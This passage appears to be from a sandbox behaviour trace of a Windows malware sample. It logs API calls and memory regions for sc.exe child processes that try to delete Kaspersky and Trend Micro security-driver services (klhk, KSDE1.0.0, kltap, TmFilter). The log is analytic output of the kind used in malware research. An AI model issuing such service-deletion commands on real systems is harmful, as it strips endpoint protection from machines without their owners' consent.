[0077.604] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.604] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.604] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.604] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.604] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.604] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.604] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.604] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.604] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.604] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.604] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.604] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.604] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.604] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.605] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7620068dc0 [0077.610] OpenServiceW (hSCManager=0x7620068dc0, lpServiceName="klhk", dwDesiredAccess=0x10000) returned 0x0 [0077.610] GetLastError () returned 0x424 [0077.610] _ultow (in: _Dest=0x424, _Radix=535297304 | out: _Dest=0x424) returned="1060" [0077.610] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.612] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x761fe7fcd0, nSize=0x2, Arguments=0x761fe7fd00 | out: lpBuffer="鎠 v") returned 0x62 [0077.612] GetFileType (hFile=0x24) returned 0x2 [0077.612] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x761fe7fc80 | out: lpMode=0x761fe7fc80) returned 1 [0077.617] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x76200693a0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x761fe7fc78, lpReserved=0x0 | out: lpBuffer=0x76200693a0*, lpNumberOfCharsWritten=0x761fe7fc78*=0x62) returned 1 [0077.618] LocalFree (hMem=0x76200693a0) returned 0x0 [0077.618] LocalFree (hMem=0x0) returned 0x0 [0077.618] CloseServiceHandle (hSCObject=0x7620068dc0) returned 1 [0077.618] LocalFree (hMem=0x0) returned 0x0 [0077.618] exit (_Code=1060) Thread: id = 331 os_tid = 0x12d4 Process: id = "65" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf0c3000" os_pid = "0xddc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"KSDE1.0.0\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1348 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1349 start_va = 0xbaefd00000 end_va = 0xbaefd1ffff entry_point = 0x0 region_type = private name = "private_0x000000baefd00000" filename = "" Region: id = 1350 start_va = 0xbaefd20000 end_va = 0xbaefd33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baefd20000" filename = "" Region: id = 1351 start_va = 0xbaefd40000 end_va = 0xbaefdbffff entry_point = 0x0 region_type = private name = "private_0x000000baefd40000" filename = "" Region: id = 1352 start_va = 0xbaefdc0000 end_va = 0xbaefdc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baefdc0000" filename = "" Region: id = 1353 start_va = 0xbaefdd0000 end_va = 0xbaefdd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baefdd0000" filename = "" Region: id = 1354 start_va = 0xbaefde0000 end_va = 0xbaefde1fff entry_point = 0x0 region_type = private name = "private_0x000000baefde0000" filename = "" Region: id = 1355 start_va = 0x7df5ffd40000 end_va = 0x7ff5ffd3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd40000" filename = "" Region: id = 1356 start_va = 0x7ff679ec0000 end_va = 0x7ff679ee2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679ec0000" filename = "" Region: id = 1357 start_va = 0x7ff679ee4000 end_va = 0x7ff679ee4fff entry_point = 0x0 region_type = private name = "private_0x00007ff679ee4000" filename = "" Region: id = 1358 start_va = 0x7ff679eee000 end_va = 0x7ff679eeffff entry_point = 0x0 region_type = private name = "private_0x00007ff679eee000" filename = "" Region: id = 1359 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1360 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1720 start_va = 0xbaefe30000 end_va = 0xbaeff2ffff entry_point = 0x0 region_type = private name = "private_0x000000baefe30000" filename = "" Region: id = 1721 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1722 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5181 start_va = 0xbaefd00000 end_va = 0xbaefd0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baefd00000" filename = "" Region: id = 5182 start_va = 0xbaefd10000 end_va = 0xbaefd16fff entry_point = 0x0 region_type = private name = "private_0x000000baefd10000" filename = "" Region: id = 5183 start_va = 0xbaeff30000 end_va = 0xbaeffedfff entry_point = 0xbaeff30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5184 start_va = 0xbaefff0000 end_va = 0xbaf006ffff entry_point = 0x0 region_type = private name = "private_0x000000baefff0000" filename = "" Region: id = 5185 start_va = 0xbaf01b0000 end_va = 0xbaf01bffff entry_point = 0x0 region_type = private name = "private_0x000000baf01b0000" filename = "" Region: id = 5186 start_va = 0x7ff679dc0000 end_va = 0x7ff679ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679dc0000" filename = "" Region: id = 5187 start_va = 0x7ff679eec000 end_va = 0x7ff679eedfff entry_point = 0x0 region_type = private name = "private_0x00007ff679eec000" filename = "" Region: id = 5188 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5189 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5192 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5193 start_va = 0xbaefdf0000 end_va = 0xbaefdf6fff entry_point = 0x0 region_type = private name = "private_0x000000baefdf0000" filename = "" Region: id = 5194 start_va = 0xbaf0070000 end_va = 0xbaf014efff entry_point = 0xbaf0070000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5195 start_va = 0xbaefe00000 end_va = 0xbaefe11fff entry_point = 0xbaefe00000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 93 os_tid = 0xde0 [0077.259] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.259] __set_app_type (_Type=0x1) [0077.259] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.259] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.259] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.357] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.357] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.357] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.357] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.357] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.357] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.357] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.357] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.357] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.357] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.357] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0077.357] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.357] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.357] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.357] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.357] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.357] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.358] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.358] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.358] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.358] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.358] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.358] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.358] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.358] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.359] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xbaefe38c80 [0077.364] OpenServiceW (hSCManager=0xbaefe38c80, lpServiceName="KSDE1.0.0", dwDesiredAccess=0x10000) returned 0x0 [0077.364] GetLastError () returned 0x424 [0077.364] _ultow (in: _Dest=0x424, _Radix=-270796280 | out: _Dest=0x424) returned="1060" [0077.364] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.365] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xbaefdbf9c0, nSize=0x2, Arguments=0xbaefdbf9f0 | out: lpBuffer="鎰º") returned 0x62 [0077.366] GetFileType (hFile=0x24) returned 0x2 [0077.366] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xbaefdbf970 | out: lpMode=0xbaefdbf970) returned 1 [0077.396] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xbaefe393b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xbaefdbf968, lpReserved=0x0 | out: lpBuffer=0xbaefe393b0*, lpNumberOfCharsWritten=0xbaefdbf968*=0x62) returned 1 [0077.396] LocalFree (hMem=0xbaefe393b0) returned 0x0 [0077.396] LocalFree (hMem=0x0) returned 0x0 [0077.396] CloseServiceHandle (hSCObject=0xbaefe38c80) returned 1 [0077.397] LocalFree (hMem=0x0) returned 0x0 [0077.397] exit (_Code=1060) Thread: id = 328 os_tid = 0x12b8 Process: id = "66" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf188000" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"kltap\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1361 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1362 start_va = 0x42a280000 end_va = 0x42a29ffff entry_point = 0x0 region_type = private name = "private_0x000000042a280000" filename = "" Region: id = 1363 start_va = 0x42a2a0000 end_va = 0x42a2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000042a2a0000" filename = "" Region: id = 1364 start_va = 0x42a2c0000 end_va = 0x42a33ffff entry_point = 0x0 region_type = private name = "private_0x000000042a2c0000" filename = "" Region: id = 1365 start_va = 0x42a340000 end_va = 0x42a343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000042a340000" filename = "" Region: id = 1366 start_va = 0x42a350000 end_va = 0x42a350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000042a350000" filename = "" Region: id = 1367 start_va = 0x42a360000 end_va = 0x42a361fff entry_point = 0x0 region_type = private name = "private_0x000000042a360000" filename = "" Region: id = 1368 start_va = 0x7df5fff50000 end_va = 0x7ff5fff4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff50000" filename = "" Region: id = 1369 start_va = 0x7ff67a530000 end_va = 0x7ff67a552fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a530000" filename = "" Region: id = 1370 start_va = 0x7ff67a55c000 end_va = 0x7ff67a55dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a55c000" filename = "" Region: id = 1371 start_va = 0x7ff67a55e000 end_va = 0x7ff67a55efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a55e000" filename = "" Region: id = 1372 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1373 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1723 start_va = 0x42a440000 end_va = 0x42a53ffff entry_point = 0x0 region_type = private name = "private_0x000000042a440000" filename = "" Region: id = 1724 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1725 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5579 start_va = 0x42a280000 end_va = 0x42a28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000042a280000" filename = "" Region: id = 5580 start_va = 0x42a290000 end_va = 0x42a296fff entry_point = 0x0 region_type = private name = "private_0x000000042a290000" filename = "" Region: id = 5581 start_va = 0x42a370000 end_va = 0x42a42dfff entry_point = 0x42a370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5582 start_va = 0x42a540000 end_va = 0x42a5bffff entry_point = 0x0 region_type = private name = "private_0x000000042a540000" filename = "" Region: id = 5583 start_va = 0x42a7b0000 end_va = 0x42a7bffff entry_point = 0x0 region_type = private name = "private_0x000000042a7b0000" filename = "" Region: id = 5584 start_va = 0x7ff67a430000 end_va = 0x7ff67a52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a430000" filename = "" Region: id = 5585 start_va = 0x7ff67a55a000 end_va = 0x7ff67a55bfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a55a000" filename = "" Region: id = 5586 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5587 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5597 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5598 start_va = 0x42a430000 end_va = 0x42a436fff entry_point = 0x0 region_type = private name = "private_0x000000042a430000" filename = "" Region: id = 5599 start_va = 0x42a5c0000 end_va = 0x42a69efff entry_point = 0x42a5c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5600 start_va = 0x42a6a0000 end_va = 0x42a6b1fff entry_point = 0x42a6a0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 94 os_tid = 0xde8 [0080.012] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.013] __set_app_type (_Type=0x1) [0080.013] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.013] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.013] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.088] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.088] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.088] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.088] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.088] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.088] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.088] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.088] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.088] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.088] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.088] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.088] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.088] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.088] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.088] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.088] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.088] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.088] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.088] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.088] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.088] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.088] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.089] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.091] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x42a448d10 [0080.096] OpenServiceW (hSCManager=0x42a448d10, lpServiceName="kltap", dwDesiredAccess=0x10000) returned 0x0 [0080.097] GetLastError () returned 0x424 [0080.097] _ultow (in: _Dest=0x424, _Radix=708050168 | out: _Dest=0x424) returned="1060" [0080.097] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.098] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x42a33fcb0, nSize=0x2, Arguments=0x42a33fce0 | out: lpBuffer="鎰⩄\x04") returned 0x62 [0080.099] GetFileType (hFile=0x24) returned 0x2 [0080.099] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x42a33fc60 | out: lpMode=0x42a33fc60) returned 1 [0080.131] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x42a4493b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x42a33fc58, lpReserved=0x0 | out: lpBuffer=0x42a4493b0*, lpNumberOfCharsWritten=0x42a33fc58*=0x62) returned 1 [0080.171] LocalFree (hMem=0x42a4493b0) returned 0x0 [0080.171] LocalFree (hMem=0x0) returned 0x0 [0080.171] CloseServiceHandle (hSCObject=0x42a448d10) returned 1 [0080.172] LocalFree (hMem=0x0) returned 0x0 [0080.172] exit (_Code=1060) Thread: id = 359 os_tid = 0x136c Process: id = "67" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf012000" os_pid = "0xdec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"TmFilter\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1374 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1375 start_va = 0xace0df0000 end_va = 0xace0e0ffff entry_point = 0x0 region_type = private name = "private_0x000000ace0df0000" filename = "" Region: id = 1376 start_va = 0xace0e10000 end_va = 0xace0e23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ace0e10000" filename = "" Region: id = 1377 start_va = 0xace0e30000 end_va = 0xace0eaffff entry_point = 0x0 region_type = private name = "private_0x000000ace0e30000" filename = "" Region: id = 1378 start_va = 0xace0eb0000 end_va = 0xace0eb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ace0eb0000" filename = "" Region: id = 1379 start_va = 0xace0ec0000 end_va = 0xace0ec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ace0ec0000" filename = "" Region: id = 1380 start_va = 0xace0ed0000 end_va = 0xace0ed1fff entry_point = 0x0 region_type = private name = "private_0x000000ace0ed0000" filename = "" Region: id = 1381 start_va = 0x7df5fff20000 end_va = 0x7ff5fff1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff20000" filename = "" Region: id = 1382 start_va = 0x7ff67a100000 end_va = 0x7ff67a122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a100000" filename = "" Region: id = 1383 start_va = 0x7ff67a12d000 end_va = 0x7ff67a12efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a12d000" filename = "" Region: id = 1384 start_va = 0x7ff67a12f000 end_va = 0x7ff67a12ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a12f000" filename = "" Region: id = 1385 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1386 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1726 start_va = 0xace0f70000 end_va = 0xace106ffff entry_point = 0x0 region_type = private name = "private_0x000000ace0f70000" filename = "" Region: id = 1727 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1728 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5620 start_va = 0xace0df0000 end_va = 0xace0dfffff entry_point = 0x0 region_type = pagefile_backed name = 